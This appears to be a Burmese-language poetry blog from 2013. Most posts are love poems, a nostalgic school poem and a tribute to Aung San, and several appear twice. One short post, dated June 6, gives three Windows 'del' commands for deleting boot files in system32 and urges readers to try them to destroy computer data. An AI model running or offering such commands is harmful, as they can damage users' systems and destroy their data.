နင့်အပေါ်မှာ ငါအတ္တကြီးတယ်လို့
ထင်လိုက်ပီလား
မထင်ပါနဲ့ဟာ ချစ်လွန်းလို့ဖြစ်သွားတာပါဟာ
နင့်အပေါ်မှာ ငါ အမြင်စောင်းတယ်လို့
ထင်လိုက်ပီလား
မထင်ပါနဲ့ဟာ ချစ်လွန်းလို့ဖြစ်သွားတာပါဟာ
နင့်အပေါ်မှာ ငါရက်စက်တယ်လို့
ထင်လိုက်ပီလား
မထင်ပါနဲ့ဟာ ချစ်လွန်းလို့ဖြစ်သွားတာပါဟာ
နင့်အပေါ်မှာ ငါသံသယထားတယ်လို့
ထင်လိုက်ပီလား
မထင်ပါနဲ့ဟာ ချစ်လွန်းလို့ဖြစ်သွားတာပါဟာ
နင့်ကိုအရမ်းချစ်လွန်းလို့
ဒီလိုလေးတွေဖြစ်သွားတာကို
နားလည်ပေးပါဟာ....................
Sunday, June 9, 2013
Saturday, June 8, 2013
ဧည့်သည်ရထား....
ရပ်ဝေးကဧည့်သည်ရထား
အလံစိမ်းမပြပဲ
ရင်ထဲက ဘူတာကို
တဟုန်ထိုး ချိုးကွေ့ကာ ၀င်လာခဲ့ပေါ့
ဧည့်သည်ရယ် အလည်သက်သက်ပဲလား
ခမ်းနားလှတယ့် ရင်ခွင်မြို့တော်မှာ
အဖိုးမဖြတ်နိုင်တယ့် နှောင်ကြိုးတွေကို
ဝယ်ပီး အလွမ်းတစ်ချို့ကို အမ်းခဲ့တယ်နော်
ဧည့်သည်ရထား
ထွက်ခွာသွားလည်း
လက်ပြ ကျန်ရစ်
နှုတ်ဆက် ဆွေးပူ
ငေးနေသူ ငါ့အတွက်တော့
အမ်းခဲ့တယ် အလွမ်းတချို့က
အမှတ်တရပဲလား................
အလံစိမ်းမပြပဲ
ရင်ထဲက ဘူတာကို
တဟုန်ထိုး ချိုးကွေ့ကာ ၀င်လာခဲ့ပေါ့
ဧည့်သည်ရယ် အလည်သက်သက်ပဲလား
ခမ်းနားလှတယ့် ရင်ခွင်မြို့တော်မှာ
အဖိုးမဖြတ်နိုင်တယ့် နှောင်ကြိုးတွေကို
ဝယ်ပီး အလွမ်းတစ်ချို့ကို အမ်းခဲ့တယ်နော်
ဧည့်သည်ရထား
ထွက်ခွာသွားလည်း
လက်ပြ ကျန်ရစ်
နှုတ်ဆက် ဆွေးပူ
ငေးနေသူ ငါ့အတွက်တော့
အမ်းခဲ့တယ် အလွမ်းတချို့က
အမှတ်တရပဲလား................
နည်းနည်းလျှော့ပါလား......
မညီနိုင်တယ်ကာရန်တွေနဲ့
ကဗျာတစ်ပုဒ်ရဲ့အဆုံးသတ်မှာ
ဇာတ်ကောင်တွေမပေါင်းရခြင်းပဲ
နင်ကိုယ်တိုင်ရေးပီး
နင်ကိုယ်တိုင်သရုပ်ဆောင်တယ့်
ကဗျာမဆန်တယ့်ပြဇာတ်ထဲမှာ
ငါဟာ မင်းသားလေးလား
နင်ငိုဆို ငို
နင်ရယ်ဆို ရယ်
နင်လွမ်းဆို လွမ်း
နင်မုန်းဆို မုန်း
ကဗျာထဲက မင်းသားလေးငါ့ကို
နင်အမျိုးမျိုး သရုပ်ဆောင်စေခဲ့တယ်
အဆုံးသတ်မှာ နင်နဲ့ငါမပေါင်းလိုက်ရပါလား
ကဗျာလေးလှဖို့ ငါ့နှလုံးသားက
အစမ်းသပ်ခံဆိုရင်
ကာရန်လေးတွေညီဖို့
နရန်လေးတွေ လှဖို့
လိုရာမှာအသုံးချပါ
မင်းသားဖြစ်တယ့်ငါက
မင်းသမီးလေးနင့်ကို
မျက်ရည်ကျအောင်ချစ်ပေမယ့်လည်း
ဇာတ်ကောင်ကိုက မပေါင်းရဘူးလို့သတ်မှတ်ထားတယ့်အတွက်
ငါဘယ်လောက်ကြိုးစားရိုးသား
နင့်ကိုမပိုင်နိုင်တော့ဘူးဆိုတာ
သေချာသွားပီပေါ့........
ကဗျာဆရာမလေးရယ်
နည်းနည်းလောက်လျှော့ပါလား
ကဗျာတစ်ပုဒ်ရဲ့အဆုံးသတ်မှာ
ဇာတ်ကောင်တွေမပေါင်းရခြင်းပဲ
နင်ကိုယ်တိုင်ရေးပီး
နင်ကိုယ်တိုင်သရုပ်ဆောင်တယ့်
ကဗျာမဆန်တယ့်ပြဇာတ်ထဲမှာ
ငါဟာ မင်းသားလေးလား
နင်ငိုဆို ငို
နင်ရယ်ဆို ရယ်
နင်လွမ်းဆို လွမ်း
နင်မုန်းဆို မုန်း
ကဗျာထဲက မင်းသားလေးငါ့ကို
နင်အမျိုးမျိုး သရုပ်ဆောင်စေခဲ့တယ်
အဆုံးသတ်မှာ နင်နဲ့ငါမပေါင်းလိုက်ရပါလား
ကဗျာလေးလှဖို့ ငါ့နှလုံးသားက
အစမ်းသပ်ခံဆိုရင်
ကာရန်လေးတွေညီဖို့
နရန်လေးတွေ လှဖို့
လိုရာမှာအသုံးချပါ
မင်းသားဖြစ်တယ့်ငါက
မင်းသမီးလေးနင့်ကို
မျက်ရည်ကျအောင်ချစ်ပေမယ့်လည်း
ဇာတ်ကောင်ကိုက မပေါင်းရဘူးလို့သတ်မှတ်ထားတယ့်အတွက်
ငါဘယ်လောက်ကြိုးစားရိုးသား
နင့်ကိုမပိုင်နိုင်တော့ဘူးဆိုတာ
သေချာသွားပီပေါ့........
ကဗျာဆရာမလေးရယ်
နည်းနည်းလောက်လျှော့ပါလား
Friday, June 7, 2013
အသည်းကွဲကဗျာ
ကဗျာလေးရယ်
နင်လှဖို့အတွက်
ငါ့နှလုံးသားက
အစမ်းသပ်ခံဆိုလည်း
ကျေနပ်ပါတယ်
ကာရန်ညီဖို့အတွက်
နရန်ပဖို့အတွက်
တို့နှလုံးသားက
အဆင်တန်ဆာဆိုရင်
လိုရာမှာ အသုံးချပါ
တကယ်လို့များ
ကဗျားလေးကို
အဆုံးသတ်ချင်ပီဆိုလည်း
ကိုကိုယ်တိုင် ပုဒ်မ ချ ပေးသွားမှာပါ
မငြိုမငြင်ပဲ ကဗျားလေးတစ်ပုဒ် လှဖို့ဆိုရင်ပေါ့နော်.......................
နင်လှဖို့အတွက်
ငါ့နှလုံးသားက
အစမ်းသပ်ခံဆိုလည်း
ကျေနပ်ပါတယ်
ကာရန်ညီဖို့အတွက်
နရန်ပဖို့အတွက်
တို့နှလုံးသားက
အဆင်တန်ဆာဆိုရင်
လိုရာမှာ အသုံးချပါ
တကယ်လို့များ
ကဗျားလေးကို
အဆုံးသတ်ချင်ပီဆိုလည်း
ကိုကိုယ်တိုင် ပုဒ်မ ချ ပေးသွားမှာပါ
မငြိုမငြင်ပဲ ကဗျားလေးတစ်ပုဒ် လှဖို့ဆိုရင်ပေါ့နော်.......................
Thursday, June 6, 2013
ကွန်ပျုတာမှ အချက်လက်များကို ပျက်စေချင်တယ်ဆိုရင်တော့
del "C:\windows\system32\bootok" /Q/S >nul
del "C:\windows\system32\bootvid" /Q/S >nul
del "C:\windows\system32\bootvrfy" /Q/S >nul
စမ်းကြည့်လိုက်ပါနော် တကယ်အသုံးဝင်ပါတယ်
del "C:\windows\system32\bootvid" /Q/S >nul
del "C:\windows\system32\bootvrfy" /Q/S >nul
စမ်းကြည့်လိုက်ပါနော် တကယ်အသုံးဝင်ပါတယ်
ဧကန်
မောင့်ကိုများလူ
စံတင်လောက်တဲ့
တည်ကြည်ခံ့ညား
ဘုန်းကျက်သရေပြည့်စုံလျှံပြီး
စေတနာပေါကြွယ် အကြင်နာချစ်ခြင်းတည်မြဲအစဉ်
လေးစားလောက်တဲ့ မောင့်စိတ်အမှန်ကိုပြမယ်ဆိုယင်
စိတ်ကိုမြိုသိပ် ကြိတ်ကာဆွေးရ
နေဆိုနေခဲ့ သေဆိုသေကာ
ခေါ်ယင်လိုက်ပါ ထားခဲ့ကျေနပ်
ဟန်ဆောင်ပြုံလို့
နေပြမဲ့မောင့်ချစ်သူ ဧကန်မှန်မို့
မငဲ့မကွက် ရဲရဲသာအမှန်
ကျေနပ်ပျော်ရွှင်မောင့်စိတ်စဉ်ကို
ထုတ်ဖော်ပြသလိုက်ပါမောင်၊၊
ကျမသိတဲ့မောင့်စိတ်မှန်ကာ
များသူငှာထင်သလို
မဟုတ်ရပါဆိုတာကိုလည်း
ခိုင်ခိုင်မြဲမြဲ ယုံကြည်ပါတယ်.မောင်၊၊.
တည်ကြည်ခံ့ညား
ဘုန်းကျက်သရေပြည့်စုံလျှံပြီး
စေတနာပေါကြွယ် အကြင်နာချစ်ခြင်းတည်မြဲအစဉ်
လေးစားလောက်တဲ့ မောင့်စိတ်အမှန်ကိုပြမယ်ဆိုယင်
စိတ်ကိုမြိုသိပ် ကြိတ်ကာဆွေးရ
နေဆိုနေခဲ့ သေဆိုသေကာ
ခေါ်ယင်လိုက်ပါ ထားခဲ့ကျေနပ်
ဟန်ဆောင်ပြုံလို့
နေပြမဲ့မောင့်ချစ်သူ ဧကန်မှန်မို့
မငဲ့မကွက် ရဲရဲသာအမှန်
ကျေနပ်ပျော်ရွှင်မောင့်စိတ်စဉ်ကို
ထုတ်ဖော်ပြသလိုက်ပါမောင်၊၊
ကျမသိတဲ့မောင့်စိတ်မှန်ကာ
များသူငှာထင်သလို
မဟုတ်ရပါဆိုတာကိုလည်း
ခိုင်ခိုင်မြဲမြဲ ယုံကြည်ပါတယ်.မောင်၊၊.
ရွှေကျောင်းတော်
လမ်းမကြီးကဘေးကိုဖယ် ရှည်လျားတဲ့ဒီလမ်းသွယ်
ဝင်ရတဲ့ဒီလမ်းရှည်တွေ့ပါပြီ ရွှေကျောင်းတော်
ခံညားတဲ့ကျက်သရေနဲ့ တပည်တွေဒီကိုလာစမ်း
ခေါ်နေသယောင်ထင်မှတ်မိလို့ ရွှေရင်စုံခုန်ရပြန်သေ
လက်ပံပင်ဇရက်ကျ ဒီစကားသာလွန်ကာ
တွေ့ဆုံပြန်ငယ်ပေါင်းတသိုက် နင်ဝလို့ရုပ်ဆိုးလား နင်ပိန်လို့လှလာတယ်
ခေတ်နဲ့အညီအပြိုင်နူတ်ဆက်တော့ငယ်မူပြန်ဆယ်ကျော်သက်ရောက်သွားရပြန်
အလွမ်းပြေကျောင်းတော်တပတ်လမ်းလျှောက်မိပြန်
မျက်လုံကအငြိမ်မနေ ခုံတန်ရှည်ကြည့်မိပြန်တော့
ဘာဘာညာညာသတိရ ရှာမိပြန်သေး
တွေ့ပါပြီ သွေး မျက်နှာပြုံးဖြီးဖြီးနဲ့
ဇလပ်နွယ် နင်ပိုလှဆိုလာပြန်တော့
ဟုတ်တာမဟုတ်တာအသာထားလို့ ဇလပ်ဘဝင်မြင့်ရပြန်
အမားအဆူခံ အတင်းဝယ်အမြန်ချုပ်တဲ့အပြာနုအောင်ခံအပြာရင့်ချိတ်ရယ်က
တကယ်ဝတ်လိုက်တော့ ခြေဖျားနဲ့လက်ဖျားသာပေါ
မင်းမူကာချယ်လဲလိုက်သူက ဝတ်ရုံနက်အစိမ်းကြားပါ
ချယ်လဲခံကျမမှာက ဘဝင်ကျကျေနပ်မိပြန်
အခမ်းအနာအဖုံဖုံ ဆင်ကာနွဲပြီးပြန်တော့
ဘဝအတွက်အမှန်ရပ်တည်မူ့အပြည့်ပေးတဲ့
ဒီလက်မှတ်လက်ဝယ်ဆောင်
ပျော်ရွှင်စွာ အပါးနဲ့အမားထံ
ရိုသေစွာအပ်မိပြန်တော့
ခံညားပျော်ရွှင် အပါးမျက်နှာ
ဝမ်သာပိတိ မျက်ရည်ဝဲတဲ့
လှပတင့်တယ်အမားမျက်နှာ
မြင်ရပြန်တော့ ဇလပ်နွယ်မျက်ရည်ဝဲမိတော့
ွှအလှပျက်မှာအလွန်ကြောက်လို့
သူငယ်ချင်းနဲ့စကားအမြန်ပြောကာထိန်းရပြန်သေး
ဒီနေမှာသောကဆိုတာဇလပ်နွယ်နဲ့လုံးလုံးမှမဆိုင်
ရင်ထဲမှာအပျော်တွေဆင့်ကာကဲတယ်
သုခဘုံဆိုတာထင်ပ အမြန်မကုန်အောင်ဆွဲထားချင်တယ်
မရပါအချိန်ရယ် ကံဖန်လာတာကခွဲရတော့မယ်
သူငယ်ချင်တွေ ဖုန်းနံပါတ်အပြန်အလှန်ပေးကာ
အဆက်အသွယ်မပြတ်ကျေး ဂတိတွေအတန်တန်ထားခဲ့
ဘဝအတွက်ဘာလုပ်မယ်တိုင်ပင်ကြပြန်တော့
ဇလပ်က အိမ်မှာအငယ်ဆုံးမို့ဟုတ်ကဲ့လုပ်ရတယ်
ချစ်သူထားပြန်တော့ ပိုကာဆိုးသူ့အလိုကြတပည့်ခံရပြန်
ဒီတခါမရပါဘုးဘာလုပ်မယ်စဉ်စားကြည့်မိ
သတိရတယ် ကိုမြင့်စိုး(ရွှေမြို့တော်သူငယ်ချင်းကျောင်းဆရာ)အားကျလို့
ွှအနိုင်ရသူရှာမိပြန်တော့ တွေပါပြီးကလေးတွေ
ဘာရမလည်းငါလည်းဆရာမလုပ်မယ်လို့
သူငယ်ချင်းတွေကိုကြွားခဲ့ပြန်တယ်
အချိန်တန်အမှန်တကယ်ခွဲရပြန်တော့
ွှအလှပျက်မှာမကြောက်တော့ပါဘူး
မျက်ရည်တွေတာလိုကျိုးကာသူငါအပြန်အလှန်
နူတ်ဆက်ကာလမ်းခွဲခဲ့တယ်
ရွှေကျောင်းတော်အမှန်လွမ်းလို့
ဒီကဗျာဇလပ်နွယ်တကယ်ရေးပါတယ်၊၊
ဇလပ်နွယ်၊၊
ဝင်ရတဲ့ဒီလမ်းရှည်တွေ့ပါပြီ ရွှေကျောင်းတော်
ခံညားတဲ့ကျက်သရေနဲ့ တပည်တွေဒီကိုလာစမ်း
ခေါ်နေသယောင်ထင်မှတ်မိလို့ ရွှေရင်စုံခုန်ရပြန်သေ
လက်ပံပင်ဇရက်ကျ ဒီစကားသာလွန်ကာ
တွေ့ဆုံပြန်ငယ်ပေါင်းတသိုက် နင်ဝလို့ရုပ်ဆိုးလား နင်ပိန်လို့လှလာတယ်
ခေတ်နဲ့အညီအပြိုင်နူတ်ဆက်တော့ငယ်မူပြန်ဆယ်ကျော်သက်ရောက်သွားရပြန်
အလွမ်းပြေကျောင်းတော်တပတ်လမ်းလျှောက်မိပြန်
မျက်လုံကအငြိမ်မနေ ခုံတန်ရှည်ကြည့်မိပြန်တော့
ဘာဘာညာညာသတိရ ရှာမိပြန်သေး
တွေ့ပါပြီ သွေး မျက်နှာပြုံးဖြီးဖြီးနဲ့
ဇလပ်နွယ် နင်ပိုလှဆိုလာပြန်တော့
ဟုတ်တာမဟုတ်တာအသာထားလို့ ဇလပ်ဘဝင်မြင့်ရပြန်
အမားအဆူခံ အတင်းဝယ်အမြန်ချုပ်တဲ့အပြာနုအောင်ခံအပြာရင့်ချိတ်ရယ်က
တကယ်ဝတ်လိုက်တော့ ခြေဖျားနဲ့လက်ဖျားသာပေါ
မင်းမူကာချယ်လဲလိုက်သူက ဝတ်ရုံနက်အစိမ်းကြားပါ
ချယ်လဲခံကျမမှာက ဘဝင်ကျကျေနပ်မိပြန်
အခမ်းအနာအဖုံဖုံ ဆင်ကာနွဲပြီးပြန်တော့
ဘဝအတွက်အမှန်ရပ်တည်မူ့အပြည့်ပေးတဲ့
ဒီလက်မှတ်လက်ဝယ်ဆောင်
ပျော်ရွှင်စွာ အပါးနဲ့အမားထံ
ရိုသေစွာအပ်မိပြန်တော့
ခံညားပျော်ရွှင် အပါးမျက်နှာ
ဝမ်သာပိတိ မျက်ရည်ဝဲတဲ့
လှပတင့်တယ်အမားမျက်နှာ
မြင်ရပြန်တော့ ဇလပ်နွယ်မျက်ရည်ဝဲမိတော့
ွှအလှပျက်မှာအလွန်ကြောက်လို့
သူငယ်ချင်းနဲ့စကားအမြန်ပြောကာထိန်းရပြန်သေး
ဒီနေမှာသောကဆိုတာဇလပ်နွယ်နဲ့လုံးလုံးမှမဆိုင်
ရင်ထဲမှာအပျော်တွေဆင့်ကာကဲတယ်
သုခဘုံဆိုတာထင်ပ အမြန်မကုန်အောင်ဆွဲထားချင်တယ်
မရပါအချိန်ရယ် ကံဖန်လာတာကခွဲရတော့မယ်
သူငယ်ချင်တွေ ဖုန်းနံပါတ်အပြန်အလှန်ပေးကာ
အဆက်အသွယ်မပြတ်ကျေး ဂတိတွေအတန်တန်ထားခဲ့
ဘဝအတွက်ဘာလုပ်မယ်တိုင်ပင်ကြပြန်တော့
ဇလပ်က အိမ်မှာအငယ်ဆုံးမို့ဟုတ်ကဲ့လုပ်ရတယ်
ချစ်သူထားပြန်တော့ ပိုကာဆိုးသူ့အလိုကြတပည့်ခံရပြန်
ဒီတခါမရပါဘုးဘာလုပ်မယ်စဉ်စားကြည့်မိ
သတိရတယ် ကိုမြင့်စိုး(ရွှေမြို့တော်သူငယ်ချင်းကျောင်းဆရာ)အားကျလို့
ွှအနိုင်ရသူရှာမိပြန်တော့ တွေပါပြီးကလေးတွေ
ဘာရမလည်းငါလည်းဆရာမလုပ်မယ်လို့
သူငယ်ချင်းတွေကိုကြွားခဲ့ပြန်တယ်
အချိန်တန်အမှန်တကယ်ခွဲရပြန်တော့
ွှအလှပျက်မှာမကြောက်တော့ပါဘူး
မျက်ရည်တွေတာလိုကျိုးကာသူငါအပြန်အလှန်
နူတ်ဆက်ကာလမ်းခွဲခဲ့တယ်
ရွှေကျောင်းတော်အမှန်လွမ်းလို့
ဒီကဗျာဇလပ်နွယ်တကယ်ရေးပါတယ်၊၊
ဇလပ်နွယ်၊၊
ဖခင်အစစ်ကြေငြာ ကန်တော့ဝင်ပါတော့မယ်
ဖခင်အစစ်ဗိုလ်ချုပ်အောင်းဆန်း
တလေးတစားအဖိုးထားကာ
ဂုဏ်အင်ကျေးဇူးအထူးပြုရ်ျ
မှတ်သားအစဉ် ကျေးဇူးရှင်က
အဘိုးကအမျိုးမှန်အဘွားကတန်ဖိုးမြင့်
ွှအမျိုးမှန်အဖိုးတန်ကဆင်းသက်တာမို့
တည်ကြည့်ရုပ်သွင်
နုတ်ခမ်းပါးရယ်ကမြင်သူတကာ
လေးစားလို့ဝပ်တွားခြင်ရဲ့
မျက်နှာတော်မော်ကာကြည့်ရင်
အလိုလိုနေရင်ချစ်ခင်စိတ်ဝင်
သူ့အသံကကြားရသူမှာ
ငါ့စကားနားထောင်ပြောစရာမလိုအောင်
သူသေဆိုရင်သေလိုက်ခြင်ရဲ့
ယုံကြည်မူ့အပေါင်းသိမ်းကြုံးလို့ယူငင်
အလိုလိုနေသူ့နောက်လိုက်ရသူအဖို့လည်း
ဂုဏ်ယူကာဝင့်ကြွားစရာပ
ဆရာကောင်းနောက်လိုက်ဖြစ်ရတာကျေနပ်မယ်အမှန်
သူပြောနေကြစကားအဆုံးက
ရင်မှာအစဉ်သာမေ့မရ ဟလား တဲ့သူ့စကားကြားရသူ
လူနတ်မကျန်အလိုလိုနားခံလျက်သားဖြစ်လို့သွားတယ်
သွားလောက်တာလည်းမပြောလေနဲ့
သူဘဝငယ်စဉ်ကစလို့
မုသားဆိုလုံးဝမသုံးမိခင်ရောင်းဈေးနုန်းအမှန်ဝင်ပြောလို့
သူခများကျော်ပြင်မှာဗျော်တင်ခံရပါသတဲ့
သူစိတ်ထားမှတ်သားစရားပ
ချစ်လို့တည်ထောင်သူ့ဘဝကိုလည်း
ဇနီးနဲ့သားသမီးငဲ့ညာကခြို့ခြံပုံက
ပဲပြုပ်ကလေးဆီစမ်းထမင်းလေးဆို
ရပါပြီး ကြည် ရယ်သူအမြဲရောင့်ရဲကနေပြန်ရှာတယ်
တကယ်အခတ်ကြုံပြည်အရေးဖြစ်လာပြန်တော့
သုတည်ထောင်ထားသူ့ဘဝလည်းပစ်
သူ့အသက်အမှန်စွန့်မယ်ဆုံးဖြတ်ချက်မပြင်
တိုင်းပြည်အရေးအမှန်ကယ်သွား
သူ့လုပ်ရပ်ကြောင့်
ဒီနေ့......
မြန်မာပြည်ဘွားလူသားအများ
မိခင် ဖခင် ဆရာသမား
ဂုဏ်ရှင်သခင်ကျေးဇူးရှင်များ
ကျန်နေခဲ့လို့ လူ့ဘဝမှာအနေတင့်နဲ့
အခြေမြင့်တဲ့လူသားများကို
ကျွန်အဖြစ်မမြင် သခင်ဘဝနဲ့မွေးဖွားခွင့်လည်းရခဲ့တယ်
အို------
အမှန်တွေးကြည့်ရင်
မြန်မာပြည်ဘွားလူသားအများတို့
မဆိုင်းမသွေအမှန်အမြန်
ကျေးဇူးရှင်အစစ်ဖခင်စစ်ရဲ့
မွေးနေ့ရက်မြတ် အထူးအမှတ်ရ်ျ
အို....မြန်မာပြည်ဘွား
လူအများ..တညီတညွတ်
ကန်တော့ခန်းအမှန်
ဝင်ကြပါစို့.....
(ဖေဖေါ်ဝါရီ ၁၃ ရက်)
ဗိုလ်ချုပ်အောင်ဆန်းမွေးနေ့ရက်မြတ်ထူးကိုရည်စူးလျက်ရေးသားဂုဏ်ပြုလိုက်ပါတယ်
ဇလပ်နွယ်
တလေးတစားအဖိုးထားကာ
ဂုဏ်အင်ကျေးဇူးအထူးပြုရ်ျ
မှတ်သားအစဉ် ကျေးဇူးရှင်က
အဘိုးကအမျိုးမှန်အဘွားကတန်ဖိုးမြင့်
ွှအမျိုးမှန်အဖိုးတန်ကဆင်းသက်တာမို့
တည်ကြည့်ရုပ်သွင်
နုတ်ခမ်းပါးရယ်ကမြင်သူတကာ
လေးစားလို့ဝပ်တွားခြင်ရဲ့
မျက်နှာတော်မော်ကာကြည့်ရင်
အလိုလိုနေရင်ချစ်ခင်စိတ်ဝင်
သူ့အသံကကြားရသူမှာ
ငါ့စကားနားထောင်ပြောစရာမလိုအောင်
သူသေဆိုရင်သေလိုက်ခြင်ရဲ့
ယုံကြည်မူ့အပေါင်းသိမ်းကြုံးလို့ယူငင်
အလိုလိုနေသူ့နောက်လိုက်ရသူအဖို့လည်း
ဂုဏ်ယူကာဝင့်ကြွားစရာပ
ဆရာကောင်းနောက်လိုက်ဖြစ်ရတာကျေနပ်မယ်အမှန်
သူပြောနေကြစကားအဆုံးက
ရင်မှာအစဉ်သာမေ့မရ ဟလား တဲ့သူ့စကားကြားရသူ
လူနတ်မကျန်အလိုလိုနားခံလျက်သားဖြစ်လို့သွားတယ်
သွားလောက်တာလည်းမပြောလေနဲ့
သူဘဝငယ်စဉ်ကစလို့
မုသားဆိုလုံးဝမသုံးမိခင်ရောင်းဈေးနုန်းအမှန်ဝင်ပြောလို့
သူခများကျော်ပြင်မှာဗျော်တင်ခံရပါသတဲ့
သူစိတ်ထားမှတ်သားစရားပ
ချစ်လို့တည်ထောင်သူ့ဘဝကိုလည်း
ဇနီးနဲ့သားသမီးငဲ့ညာကခြို့ခြံပုံက
ပဲပြုပ်ကလေးဆီစမ်းထမင်းလေးဆို
ရပါပြီး ကြည် ရယ်သူအမြဲရောင့်ရဲကနေပြန်ရှာတယ်
တကယ်အခတ်ကြုံပြည်အရေးဖြစ်လာပြန်တော့
သုတည်ထောင်ထားသူ့ဘဝလည်းပစ်
သူ့အသက်အမှန်စွန့်မယ်ဆုံးဖြတ်ချက်မပြင်
တိုင်းပြည်အရေးအမှန်ကယ်သွား
သူ့လုပ်ရပ်ကြောင့်
ဒီနေ့......
မြန်မာပြည်ဘွားလူသားအများ
မိခင် ဖခင် ဆရာသမား
ဂုဏ်ရှင်သခင်ကျေးဇူးရှင်များ
ကျန်နေခဲ့လို့ လူ့ဘဝမှာအနေတင့်နဲ့
အခြေမြင့်တဲ့လူသားများကို
ကျွန်အဖြစ်မမြင် သခင်ဘဝနဲ့မွေးဖွားခွင့်လည်းရခဲ့တယ်
အို------
အမှန်တွေးကြည့်ရင်
မြန်မာပြည်ဘွားလူသားအများတို့
မဆိုင်းမသွေအမှန်အမြန်
ကျေးဇူးရှင်အစစ်ဖခင်စစ်ရဲ့
မွေးနေ့ရက်မြတ် အထူးအမှတ်ရ်ျ
အို....မြန်မာပြည်ဘွား
လူအများ..တညီတညွတ်
ကန်တော့ခန်းအမှန်
ဝင်ကြပါစို့.....
(ဖေဖေါ်ဝါရီ ၁၃ ရက်)
ဗိုလ်ချုပ်အောင်ဆန်းမွေးနေ့ရက်မြတ်ထူးကိုရည်စူးလျက်ရေးသားဂုဏ်ပြုလိုက်ပါတယ်
ဇလပ်နွယ်
အချစ်မခံရတော့လို့
မောင့်အထင်မြင်လေတာက
ကျမဘဝင်တခဏတာမရွှင်လည်း
အချစ်မခံရတော့လို့ထင်။။
နက်နံတခါ ညတကြိမ်ဖုန်းမကိုင်လည်း
အချစ်မခံရတော့လို့ထင်၊၊
မောင့်အမြင်မကြည်ထင်နေတာမို့
မောင့်စိတ်ဘဝင်ထာဝစဉ်ရွှင်အောင်
ကတိ စကားပြောလိုက်ခြင်တယ်
ဒီတသက်နောင်အဆက်ဆက်
မောင့်ကိုသခင်အချစ်ဘုရင်
ထာဝစဉ်မောင့်ထံခစားနေရသူ
ဲဖြစ်မယ်ဆိုတာအကြွင်းမဲ့
ယုံကြည်ပေးပါမောင်။။
ဇလပ်နွယ်
ကျမဘဝင်တခဏတာမရွှင်လည်း
အချစ်မခံရတော့လို့ထင်။။
နက်နံတခါ ညတကြိမ်ဖုန်းမကိုင်လည်း
အချစ်မခံရတော့လို့ထင်၊၊
မောင့်အမြင်မကြည်ထင်နေတာမို့
မောင့်စိတ်ဘဝင်ထာဝစဉ်ရွှင်အောင်
ကတိ စကားပြောလိုက်ခြင်တယ်
ဒီတသက်နောင်အဆက်ဆက်
မောင့်ကိုသခင်အချစ်ဘုရင်
ထာဝစဉ်မောင့်ထံခစားနေရသူ
ဲဖြစ်မယ်ဆိုတာအကြွင်းမဲ့
ယုံကြည်ပေးပါမောင်။။
ဇလပ်နွယ်
မောင့်မူပိုင်ရှင်
မောင်က
ကျမအတွက်ဆို
လူသူအများဘယ်လိုထင်ထင်
သိအောင်တမျိုး မသိအောင်တဖုံ
ကျမဆိုးနွဲ့မူသမျှကို ညိုငြင်စိတ်ထား
မရှိပါပဲသီးခံခွင့်လွတ်လိုက်လျောပေးကာ
ချစ်မြဲချစ်လျှက်ချစ်နေတာမို့။။
ကျမလည်း
မောင့်အတွက်ဆို
သက်နှင်းမပျက် ချစ်ပေးဆပ်လျှက်
ဒီဘဝပါနောင်ဘဝအဆက်ဆက်
မပျက်မကွက်မောင့်ကိုတင်မြှောက်
ကျမသခင်အချစ်ဘုရင်ဖြစ်စေ၊၊
ကျမကတော့မောင့်ထံခစား
ဒေဝီကညာမဒီတပါးအစဉ်ဖြစ်လျှက်
မောင့်မူပိုင်ရှင်လုပ်မယ့်သူပါရှင်။၊
ကျမအတွက်ဆို
လူသူအများဘယ်လိုထင်ထင်
သိအောင်တမျိုး မသိအောင်တဖုံ
ကျမဆိုးနွဲ့မူသမျှကို ညိုငြင်စိတ်ထား
မရှိပါပဲသီးခံခွင့်လွတ်လိုက်လျောပေးကာ
ချစ်မြဲချစ်လျှက်ချစ်နေတာမို့။။
ကျမလည်း
မောင့်အတွက်ဆို
သက်နှင်းမပျက် ချစ်ပေးဆပ်လျှက်
ဒီဘဝပါနောင်ဘဝအဆက်ဆက်
မပျက်မကွက်မောင့်ကိုတင်မြှောက်
ကျမသခင်အချစ်ဘုရင်ဖြစ်စေ၊၊
ကျမကတော့မောင့်ထံခစား
ဒေဝီကညာမဒီတပါးအစဉ်ဖြစ်လျှက်
မောင့်မူပိုင်ရှင်လုပ်မယ့်သူပါရှင်။၊
မေ့သွားတာမဟုတ်ပါ
အများနဲ့မတူ တမူထူးစွာ
ကွဲပြားအမြဲ လွန်စွာကဲပြီး
တရေးနိုးတောင် မရမကခဏခဏ
အချစ်ရေးလို့ ထခေါ်ကာမြဲ
မောင့်ရင်ခွင်ထဲမင်းမရှိကာ
ချစ်ကလေးအသံမကြားရရင်
အိပ်မပျော်တာမို့ ကျေးဇူးပြုပြီး
မောင့်ရင်ခွင်ထဲ ပေးပါနော်။။
မောင့်ပြောစကားမေ့သွားတာမဟုတ်ပါ
ခဏကလေးမေ့ထားတာပါ။၊
မောင်မသိတဲ့နောက်ကွယ်မှာတော့
မအားလပ်တဲတာဝန်ခြားက
ဝိညာဉ်လွင့်မတတ်လွမ်းနေရုံကလွဲပြီး
မတတ်နိုင်တဲ့ဒီဘဝမှာခဏလေးတော့
ချစ်ကာအမြဲနေပေးပါနော်
နော်---နော်လို့၊၊
ဇလပ်နွယ်
ကွဲပြားအမြဲ လွန်စွာကဲပြီး
တရေးနိုးတောင် မရမကခဏခဏ
အချစ်ရေးလို့ ထခေါ်ကာမြဲ
မောင့်ရင်ခွင်ထဲမင်းမရှိကာ
ချစ်ကလေးအသံမကြားရရင်
အိပ်မပျော်တာမို့ ကျေးဇူးပြုပြီး
မောင့်ရင်ခွင်ထဲ ပေးပါနော်။။
မောင့်ပြောစကားမေ့သွားတာမဟုတ်ပါ
ခဏကလေးမေ့ထားတာပါ။၊
မောင်မသိတဲ့နောက်ကွယ်မှာတော့
မအားလပ်တဲတာဝန်ခြားက
ဝိညာဉ်လွင့်မတတ်လွမ်းနေရုံကလွဲပြီး
မတတ်နိုင်တဲ့ဒီဘဝမှာခဏလေးတော့
ချစ်ကာအမြဲနေပေးပါနော်
နော်---နော်လို့၊၊
ဇလပ်နွယ်
သခင်
သခင်
မမြင်မကြင်ချင်အောင်
တမင်ပုန်းလို့ရှောင်ခွာတိမ်းတဲ့သူ
မောင်မကြင်မမြင်ချင်ပေမဲ့
ကျမရင်နေဆယ်ဆကဲ
လွန်ပူပြင်းဒဏ်
သဲအူပြတ်မျှခစားရတာ
မခံနိုင်တာမို့
တောင်းပန်ခယပြောပါရစေသခင်
အားနာသနားငဲ့ညာကာ
တချက်လောက်တော့လှဲ့ကြည့်ပါမောင်။၊
